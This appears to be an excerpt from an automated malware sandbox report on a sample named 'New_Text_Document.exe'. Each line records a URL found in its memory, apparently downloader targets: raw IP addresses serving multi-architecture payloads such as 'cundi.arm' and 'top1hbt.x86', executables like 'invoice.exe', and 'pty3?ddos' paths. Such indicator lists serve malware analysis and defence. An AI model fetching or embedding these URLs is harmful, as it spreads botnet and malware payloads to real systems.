                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.183.208.237:55771/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://106.1.1.207:49691/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://106.1.144.9:13548/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://106.1.184.222:3735/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://106.1.187.165:20511/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://106.104.113.145:21487/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://106.104.166.240:1052/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://106.104.193.155:27013/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://106.105.210.116:57170/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://106.105.244.7:2215/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://106.246.224.219/.l/pty3
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://106.246.224.219/.l/pty3?ddos
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://106.246.224.219/.l/pty4
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://106.246.224.219/.l/pty4?ddos
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.135.46.249:37221/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.172.0.180/invoice.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.173.165.204/cundi.arm
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.173.165.204/cundi.arm5
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.173.165.204/cundi.arm6
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.173.165.204/cundi.arm7
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.173.165.204/cundi.m68k
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.173.165.204/cundi.mips
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.173.165.204/cundi.mpsl
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.173.165.204/cundi.ppc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.173.165.204/cundi.sh4
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.173.165.204/cundi.x86
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.173.165.204/cundi.x86_64
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.173.4.18/220/audiodgse.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.173.4.18/230/audiodgse.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.174.93.107/top1hbt.arm
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.174.93.107/top1hbt.arm5
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.174.93.107/top1hbt.arm6
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.174.93.107/top1hbt.arm7
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.174.93.107/top1hbt.m68k
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.174.93.107/top1hbt.mips
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.174.93.107/top1hbt.mpsl
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.174.93.107/top1hbt.ppc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.174.93.107/top1hbt.sh4
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.174.93.107/top1hbt.x86
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.174.93.107/top1hbt.x86_64
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.175.113.216/pastor/-irrkt.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.175.113.216/pastor/Abzyvhxf.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.175.113.216/pastor/Czlsl.pdf
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.175.113.216/pastor/axes.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.175.113.216/pastor/irrkt.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.175.113.216/pastor/retain.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.175.3.22/wgw/1/x8.x8.x8.x0x0.doc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.185.244.88:28900/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.185.9.221:25465/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.190.201.37:3963/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.190.56.144:49018/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.190.71.121:38942/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.2.158.69:36459/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.215.118.55:5471/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.224.185.153:50206/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.224.185.154:50206/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.224.185.155:50206/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.224.185.156:50206/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.224.185.157:50206/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.224.185.159:50206/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.244.7.9:27118/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.27.217.242:14701/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.29.44.126:10986/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.46.196.185:7905/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.46.227.185:62180/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.5.183.90:18957/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.5.189.134:5702/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.51.59.34:50433/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.52.24.16:50448/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.6.224.19:57262/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.6.250.80:8968/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.6.44.198:43328/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.65.15.57:27118/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.65.15.61:27118/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.65.15.62:27118/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.103.64.104:64069/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.103.64.69:49444/.i
